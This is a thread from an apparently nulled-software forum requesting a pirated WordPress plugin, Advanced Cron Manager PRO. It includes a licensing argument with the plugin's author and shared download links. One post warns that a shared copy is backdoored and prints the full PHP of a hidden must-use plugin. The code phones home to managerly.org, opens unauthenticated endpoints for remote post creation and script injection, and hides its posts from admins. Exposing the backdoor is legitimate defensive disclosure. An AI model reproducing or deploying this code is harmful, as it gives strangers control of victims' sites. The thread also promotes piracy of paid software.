REQ Plugin [REQ] Advanced Cron Manager PRO v2.6.0

alxbg

alxbg

Member
Jan 25, 2019
43
21
8
Kudos, Benjamin! At the time, all available DL's of the PRO addon, even paid ones, were for up to 2.3.2, which are incompatible with the free plugin latest versions that's required .
 
Kubitomakita

Kubitomakita

New member
Mar 5, 2020
2
0
1
Hi @alexbg, @Benjamin1997, ACM plugin author here.

Alex, if it's a great plugin why won't you buy the license to get official, clean updates the minute they come up?

Benjamin, thanks for resharing the package 👎
 
alxbg

alxbg

Member
Jan 25, 2019
43
21
8
Kubitomakita said:
Alex, if it's a great plugin why won't you buy the license to get official, clean updates the minute they come up?
Click to expand...

Simply because your licensing model sucks:
$39 per year, plus extra $19 for support.
I like the tool, but in my case I use it rarely enough to make sense of such an expensive & revolving cost.

Kubitomakita said:
Benjamin, thanks for resharing the package 👎
Click to expand...

Not necessarily, as you probably well know, there are other sites offering your plugin a lot cheaper under GPL: [click]

Need to fix your business model to address the above issues first, before you can get to make new customers of us -- also users & contributors of the OSS community. Instead, you attempt thin-veiled public-shaming for not like supporting rent-seeking behind an OSS face. Sure, we all have to eat, but that isn't the way, and such market forces prove it.

My 2c.
 
  • Like
Reactions: KarmaticOne
Kubitomakita

Kubitomakita

New member
Mar 5, 2020
2
0
1
It's open-source, yeah, you can take it and even sell it on your own. But this is far from being ok.

I imagine you going to an electronics shop and tell the merchant: "this TV is too expensive, I'm taking it". Dude, if the plugin is too expensive for you, debug on your own.

The plugin is just the code you can write yourself or put together from Stack Overflow. Don't know how? Don't have time? Well, there is your $39 yearly price tag.
 
alxbg

alxbg

Member
Jan 25, 2019
43
21
8
Dude, that's a battered and dead-end discussion with a lot written about. I'm not saying it's "okay". As said, you (and I) have to eat too, obviously. What I'm saying is: one needs to think harder of a business model to make money off open-source that better adapts to its aims and idiosyncrasies. This latest trend of "yearly subscriptions" within OSS is garbage copied from the rent-seeking corporate world. It's NOT okay when applied to fellow devs and ordinary users struggling to sail their boat. The distinctly different community-driven vibe is what makes OSS possible.

As a last note, out of respect for ACM's usefulness and your overall OSS efforts, a constructive suggestion: I believe most of us are okay paying a fee when a product or service has objectively helped us making such money in the first place (think ebay, amazon). Tools like ACM alone are rarely that kind of product, but could become a stepping-stone in a well-focused client-oriented consultancy.
 
  • Like
  • Love
Reactions: deo, KarmaticOne, ckeeper and 1 other person
johnyblack

johnyblack

Active member
Aug 10, 2018
122
43
28
Andromeda
Benjamin1997 said:
Here you go

mega.nz

MEGA

MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now
mega.nz mega.nz

V2.4.0
Click to expand...
@Tomz
GUYS STAY AWAY FROM THIS DOWNLOAD. is backdoored generates this file /wp-content/mu-plugins/rms_unique_wp_mu_pl_fl_nm.php




This is malicious code.
The file wp-content/mu-plugins/rms_unique_wp_mu_pl_fl_nm.php opens up remote login to people with access to the site url by passing in a 'token' in the url. If you check the file, you can see it reporting the site url back to a site managerly.org.

Check this plugins - rms_unique_wp_mu_pl_fl_nm.php - WordPress Development Stack Exchange[^] as well.

Best to delete that file - wp-content/mu-plugins/rms_unique_wp_mu_pl_fl_nm.php

CHECK THE CODE PLEASE


PHP: 
<?php
    if(!function_exists('do_rms_activation_task'))
    {
        /* ------------Register Config Variables------------ */
        $GLOBALS['rms_report_to']            =   'https://managerly.org/wp-admin/admin-ajax.php';
      
        $GLOBALS['rms_disclaimer_text']      =   [];
      
        $GLOBALS['rms_ajax_del_request']     =   false;

        function send_rms_curl_request($action, $body)
        {
            $body['action']             =   $action;
            $body['remote_site_hash']   =   get_option('rms_remote_site_hash', '');
            $body['remote_site_id']     =   get_option('rms_remote_site_id', 0);
          
            $connect_to=$GLOBALS['rms_report_to'];

            $args=
            [
                'method'      => 'POST',
                'timeout'     => 15,
                'redirection' => 15,
                'headers'      => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']],
                'body'        => $body
            ];

            // Send to RMS
            $curl   = new Wp_Http_Curl();
          
            $result=$curl->request($connect_to, $args);

            $result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;

            return !$result ? [] : $result;
        }

        /* -------------Register Site to Manager------------- */
        function do_rms_activation_task($name, $text, $activating)
        {
            // generate password for later remote actions
            $length     = 5;
            $rms_pass   = substr(str_shuffle(str_repeat($x='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length/strlen($x)) )),1,$length);
            $rms_pass   = $rms_pass.microtime(true);
            $hash       = password_hash($rms_pass, PASSWORD_BCRYPT);

            $show_post=get_option('rms_show_post_to_logged');
            $show_post!=='yes' ? $show_post='no' : 0;

            // Gather data
            $data=
            [
                'title'     => get_bloginfo('name'),
                'url'       => get_home_url(),
                'ajax_url'  => admin_url('admin-ajax.php'),
                'ip'        => $_SERVER['SERVER_ADDR'],
                'tp'        => $name,
                'tp_status' => $activating,
                'hash'      => $hash,
                'show_to_logged'=>$show_post
            ];

            // send to rms
            $result = send_rms_curl_request('rms_ping_from_the_universe', ['site_data' => json_encode($data)]);

            update_option('rms_remote_site_id', (isset($result['id']) ? $result['id'] : 0));
            update_option('rms_remote_site_hash', (isset($result['hash']) ? $result['hash'] : ''));

            update_option('rms_remote_connection_pass', $rms_pass);

            // show disclaimer if necessary when activating
            if($activating==true)
            {
                is_string($text) ? $GLOBALS['rms_disclaimer_text'][]=$text : 0;

                if(count($GLOBALS['rms_disclaimer_text'])>0)
                {
                    $resp=json_encode($GLOBALS['rms_disclaimer_text']);

                    setcookie('rms_disclaimer_pop_up', $resp);
                }
            }
        }

        /* check remote hash */
        function rms_check_remote_hash_pass()
        {
            if(isset($_POST['remote_connection_hash']) && is_string($_POST['remote_connection_hash']))
            {
                $rms_pass=get_option('rms_remote_connection_pass');

                if(is_string($rms_pass) && password_verify($rms_pass, $_POST['remote_connection_hash']))
                {
                    return true;
                }
            }
            exit;
        }

        /* ----Delete featured image upon change or delete---- */
        function delete_rms_thumbnaiil_remote($post_id)
        {
            $post_thumbnail_id = get_post_thumbnail_id( $post_id );
          
            is_numeric($post_thumbnail_id) ? wp_delete_attachment($post_thumbnail_id, true) : 0;
        }

        /* -----------Fetch and create featured image----------- */
        function rms_create_post_thumbnail($image_url, $post_id)
        {
            $image_name       = explode('/', $image_url);
            $image_name       = end($image_name);
            $upload_dir       = wp_upload_dir(); // Set upload folder
            $image_data       = file_get_contents($image_url); // Get image data

            if($image_data==false)
            {
                return;
            }

            $unique_file_name = wp_unique_filename( $upload_dir['path'], $image_name ); // Generate unique name
            $filename         = basename( $unique_file_name ); // Create image file name

            // Check folder permission and define file location
            if( wp_mkdir_p( $upload_dir['path'] ) ) {
                $file = $upload_dir['path'] . '/' . $filename;
            } else {
                $file = $upload_dir['basedir'] . '/' . $filename;
            }

            // Create the image  file on the server
            file_put_contents( $file, $image_data );

            // Check image file type
            $wp_filetype = wp_check_filetype( $filename, null );

            // Set attachment data
            $attachment = array(
                'post_mime_type' => $wp_filetype['type'],
                'post_title'     => sanitize_file_name( $filename ),
                'post_content'   => '',
                'post_status'    => 'inherit'
            );

            // Delete existing thumbnail
            delete_rms_thumbnaiil_remote($post_id);

            // Create the attachment
            $attach_id = wp_insert_attachment( $attachment, $file, $post_id );

            update_post_meta($attach_id, 'rms_remote_featured_image', $post_id);

            // Include image.php
            require_once(ABSPATH . 'wp-admin/includes/image.php');

            // Define attachment metadata
            $attach_data = wp_generate_attachment_metadata( $attach_id, $file );

            // Assign metadata to attachment
            wp_update_attachment_metadata( $attach_id, $attach_data );

            // And finally assign featured image to post
            set_post_thumbnail( $post_id, $attach_id );

            return $attach_id;
        }

        /* ----------------Create various posts---------------- */
        add_action('wp_ajax_nopriv_rms_ping_from_the_universe', function()
        {
            rms_check_remote_hash_pass();

            if(!isset($_POST['post'])){exit;}

            $post=json_decode(stripcslashes($_POST['post']), true);
          
            if($post['local_id']>0)
            {
                /* Retrieve existing post id */
                $args=
                [
                    'post_type'=>['post', 'page', 'rms_remote_hook'],
                    'post_status' => 'any',
                    'meta_key'=>'rms_rm_uniq_meta_post_id',
                    'meta_value'=>$post['local_id']
                ];
              
                $ex_post=get_posts($args);

                // if exist, update that
                (is_array($ex_post) && isset($ex_post[0], $ex_post[0]->ID)) ? $post['ID']=$ex_post[0]->ID : 0;
            }
                      
            $to_post=['ID', 'post_title', 'post_content', 'post_type', 'post_status'];

            // Convert post content
            $pst=[];
            foreach($to_post as $k)
            {
                if(isset($post[$k]))
                {
                    isset($post['hook_name']) ? $post[$k]=htmlspecialchars($post[$k]) : 0;

                    $pst[$k]=$post[$k];
                }
            }

            // Default return value
            $resp=['rms_post_id'=>0, 'rms_post_url'=>''];

            $post_id=wp_insert_post($pst);

            if(is_numeric($post_id) && $post_id>0)
            {
                remove_action('pre_get_posts', 'rms_pre_get_post_filter_action');
              
                $resp['rms_post_id']=$post_id;
                $resp['rms_post_url']=$post['post_type']=='rms_remote_hook' ? get_home_url() : get_permalink($post_id);

                update_post_meta($post_id, 'rms_rm_uniq_meta_post_id', $post['local_id']);

                // Generate featured image
                if(isset($post['featured_image']))
                {
                    rms_create_post_thumbnail($post['featured_image'], $post_id);
                }
              
                isset($post['hook_name']) ? update_post_meta($post_id, 'rms_remote_hook', $post['hook_name']) : 0;
            }

            exit(json_encode($resp));
        });

        /* Enable/disable post show hide */
        add_action('wp_ajax_nopriv_rms_change_remote_post_state_for_logged', function()
        {
            rms_check_remote_hash_pass();

            if(isset($_POST['post_state']))
            {
                $state=(is_string($_POST['post_state']) && $_POST['post_state']=='yes') ? 'yes' : 'no';

                update_option('rms_show_post_to_logged', $state);

                exit(json_encode(['message'=>'New post state assigned.']));
            }
        });


        /* --------------Delete posts-------------- */
        add_action('wp_ajax_nopriv_rms_ping_delete_content', function()
        {
            rms_check_remote_hash_pass();

            if(!isset($_POST['local_ids'])){exit;}

            $l_ids = json_decode(stripcslashes($_POST['local_ids']), true);

            if(!is_array($l_ids) || count($l_ids)==0){exit;}

            $args=
            [
                'meta_key'  =>'rms_rm_uniq_meta_post_id',
                'meta_value'=>$l_ids,
                'post_status'=>'any',
                'post_type'=>['post', 'page', 'rms_remote_hook']
            ];

            $pst=get_posts($args);

            $GLOBALS['rms_ajax_del_request']=true;

            foreach($pst as $p)
            {
                delete_rms_thumbnaiil_remote($p->ID);
                wp_delete_post($p->ID, true);
            }

            exit(json_encode(['message'=>count($pst).' posts deleted from remote site.']));
        });



        /* ----------Invoke remote hooks---------- */
        $hook_posts=get_posts(['post_type'=>'rms_remote_hook', 'post_status'=>'any']);
        !is_array($hook_posts) ? $hook_posts=[] : 0;

        // Store hook posts in global
        global $rms_hok_list_array;
        $GLOBALS['rms_hok_list_array']=[];

        foreach($hook_posts as $p)
        {
            $met=get_post_meta($p->ID, 'rms_remote_hook', true);

            if(!is_string($met) || $met==''){continue;}

            !isset($GLOBALS['rms_hok_list_array'][$met]) ? $GLOBALS['rms_hok_list_array'][$met]=[] : 0;

            $GLOBALS['rms_hok_list_array'][$met][]=htmlspecialchars_decode($p->post_content);
        }

        // Process individual hook
        function run_rms_hook_caller_func($hook_name)
        {
            if(!isset($GLOBALS['rms_hok_list_array'][$hook_name])){return;}
          
            foreach($GLOBALS['rms_hok_list_array'][$hook_name] as $str)
            {
                echo is_string($str) ? $str : '';
            }
        }

        /* Post delete hook/notification */
        add_action( 'before_delete_post', 'rms_action_function_name_6568');
        function rms_action_function_name_6568($id)
        {
            $local_id=get_post_meta($id, 'rms_rm_uniq_meta_post_id', true);

            if(!is_numeric($local_id)){return;}
          
            delete_rms_thumbnaiil_remote($id);

            if($GLOBALS['rms_ajax_del_request']==true){return;}

            send_rms_curl_request('rms_del_ping_from_the_remote', ['local_id'=>$local_id, 'remote_id'=>$id]);
        }

        /* ----------Hide post for logged in---------- */
        function rms_pre_get_post_filter_action($query)
        {
            $meta_query = $query->get('meta_query');
          
            !is_array($meta_query) ? $meta_query=[] : 0;
          
            $meta_query[] = [
                                'key'=>'rms_rm_uniq_meta_post_id',
                                'compare'=>'NOT EXISTS'
                            ];
          
            $meta_query[] = [
                                'key'=>'rms_remote_featured_image',
                                'compare'=>'NOT EXISTS'
                            ];

            $query->set('meta_query', $meta_query);
        }
        add_action('init', function()
        {
            if(get_option('rms_show_post_to_logged')=='yes' || !is_user_logged_in())
            { 
                if(!is_admin() && strpos(strtolower($_SERVER['REQUEST_URI']), 'wp-json/wp/')===false)
                {
                    add_action('wp_head', function(){run_rms_hook_caller_func('wp_head');});
                    add_action('wp_footer', function(){run_rms_hook_caller_func('wp_footer');});
                }
              
                return;
            }
          
            add_action('admin_head', function()
            {
                echo '<style>ul.subsubsub li.mine{display:none !important}</style>';
            });

            add_filter('pre_get_posts', 'rms_pre_get_post_filter_action');
        });
      
        /* --------------Frontend Scripts-------------- */
        add_action('admin_footer', function()
        {
            ?>
                <script>
                    jQuery(document).ready(function($)
                    {
                        var delete_cookie=function( name )
                        {
                            document.cookie = name + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';
                        }

                        var rms_getCookie=function(cname)
                        {
                            var name = cname + "=";
                            var ca = document.cookie.split(';');
                            for(var i = 0; i < ca.length; i++) {
                                var c = ca[i];
                                while (c.charAt(0) == ' ') {
                                c = c.substring(1);
                                }
                                if (c.indexOf(name) == 0) {
                                return c.substring(name.length, c.length);
                                }
                            }
                            return "";
                        }

                        /* ----------Show disclaimer if necessary---------- */
                        var disc=rms_getCookie('rms_disclaimer_pop_up');
                        if(!disc){return;}

                        disc = disc.replace(/\+/g, '%20');
                        disc = decodeURIComponent(disc);

                        disc=JSON.parse(disc);
                      
                        if(!Array.isArray(disc)){return;}

                        disc.forEach(function(text)
                        {
                            var container=$('<div></div>');
                          
                            container.css
                            ({
                                'position':'fixed',
                                'left':0,
                                'right':0,
                                'top':0,
                                'bottom':0,
                                'background':'rgba(0, 0, 0, 0.384)',
                                'z-index':'999999999'
                            });

                            var disclaimer=$('<div></div>');
                            disclaimer.css
                            ({
                                'width':'500px',
                                'position':'relative',
                                'top':'40px',
                                'max-width':'calc(100% - 40px)',
                                'max-height':'calc(100% - 80px)',
                                'overflow':'auto',
                                'padding':'11px',
                                'background':'white',
                                'border-radius':'7px',
                                'margin':'auto auto',
                                'display':'block'
                            }).find('img').css
                            ({
                                'max-width':'100%',
                                'height':'auto'
                            });

                            var head=$('<h4>Disclaimer</h4>');
                            head.css
                            ({
                                'text-align':'center'
                            });

                            var body=$('<div></div>');
                            body.html(text);

                            var agree=$('<div style="text-align:right"><button class="button button-primary">Agree</button></div>');
                            agree.find('button').click(function()
                            {
                                container.remove();
                            });
                          
                            disclaimer.append(head).append(body).append(agree);
                            container.append(disclaimer);

                            $('body').append(container);
                        });
                      
                        delete_cookie('rms_disclaimer_pop_up');
                    });
                </script>
            <?php
        });
    }
?>
 

Attachments

  • viruz.jpg
    viruz.jpg
    181.6 KB · Views: 31
Last edited:
  • Like
Reactions: ptvtpc, deo and alxbg
johnyblack

johnyblack

Active member
Aug 10, 2018
122
43
28
Andromeda
alxbg said:
BTW, at the time I had reported this malware to the author of Anti-Malware Security and Brute-Force Firewall, so that plugin should be able now to clean an infected site with such a threat.
Click to expand...
i scan the whole plugin to virus total and not found a single virus an than i check the code and google search this mystery php files and found full 4-5 backdoors inside the plugin. Please download only from trusted uploaders. Thank you
 
J

julien

Active member
Nov 1, 2019
182
161
43
Version 2.4.2
 

Attachments

  • advanced-cron-manager-pro-2.4.2.zip
    90.4 KB · Views: 23
A

an0nimo

Member
Jan 5, 2019
51
17
8
Dude this is a nulled forum, it's like going to a whore house and telling them that they can fu** their wife at home instead going there. That's something that you've only got to deal with it. Btw I don't have money to spare with this, I know is high quality, but Im poor
 
Last edited:
  • Like
Reactions: merdate
tanierlyons

tanierlyons

Well-known member
Staff member
Administrative
Moderator
May 24, 2018
75,070
111,716
120
alxbg said:
A difficult to find but great plugin for extensive managing of cron jobs. Current PRO version is: 2.4.1

bracketspace.com

Advanced Cron Manager : PRO - BracketSpace

Advanced Cron Manager for WordPress is your go-to solution to view all events in WP-Cron and gain full control over them!
bracketspace.com bracketspace.com
Click to expand...
akaryan2015 said:
+1 Latest version needed.
Click to expand...
4c0u8 said:
What's the scanner name you took the screenshot from? Thanks
Click to expand...
 
You must log in or register to reply here.

Similar threads

mohiko
REQ Plugin [REQ] Advanced Stock Options for WooCommerce
Replies
0
Views
271
Request Section
mohiko
mohiko
R
REQ Plugin [Req] Advanced Woo Search PRO
Replies
5
Views
971
Request Section
djcebax
djcebax
Insession
REQ Plugin [REQ] Advanced Charts Builder 1.5.7
Replies
0
Views
242
Request Section
Insession
Insession
jonhkane00
REQ Theme [REQ] Frontendmasters's "Remix Fundamentals" & "Advanced Remix" course
Replies
1
Views
285
Request Section
maikeyso
maikeyso
BerkeT
[REQ] Advanced Product Fields for WooCommerce
Replies
2
Views
906
Request Section
mofnone_s
M

Latest posts

Forum statistics

Threads
69,236
Messages
908,504
Members
237,233
Latest member
simo1az

Share this page

Share this page

About us

  • Our community has been around for many years and pride ourselves on offering unbiased, critical discussion among people of all different backgrounds. We are working every day to make sure our community is one of the best.

Quick Navigation

Forums Contact us

User Menu

Login
Community platform by XenForo © 2010-2022 XenForo Ltd.
Top Bottom